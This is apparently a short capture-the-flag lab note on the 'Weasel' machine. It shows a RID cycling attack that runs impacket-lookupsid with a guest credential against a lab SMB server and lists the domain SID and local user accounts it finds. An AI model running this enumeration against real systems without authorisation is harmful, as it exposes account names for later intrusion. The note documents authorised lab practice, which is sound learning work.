Weasel_RID_Cycling

RID Cycling

---

The target SMB server allows guest session with read access to the IPC$ share. This would mean that RID Cycling attack can be employed to bruteforce user’s RIDs.

┌──(kali㉿kali)-[~/archive/thm/weasel]
└─$ impacket-lookupsid blah@$IP 100000
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
 
Password:
[*] Brute forcing SIDs at 10.10.232.68
[*] StringBinding ncacn_np:10.10.232.68[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2336295375-1619315875-398172279
500: DEV-DATASCI-JUP\Administrator (SidTypeUser)
501: DEV-DATASCI-JUP\Guest (SidTypeUser)
503: DEV-DATASCI-JUP\DefaultAccount (SidTypeUser)
504: DEV-DATASCI-JUP\WDAGUtilityAccount (SidTypeUser)
513: DEV-DATASCI-JUP\None (SidTypeGroup)
1000: DEV-DATASCI-JUP\dev-datasci-lowpriv (SidTypeUser)
1001: DEV-DATASCI-JUP\sshd (SidTypeUser)

Performing the RID cycling attack with an arbitrary credential against the target SMB service; blahblah dev-datasci-lowpriv and sshd accounts identified.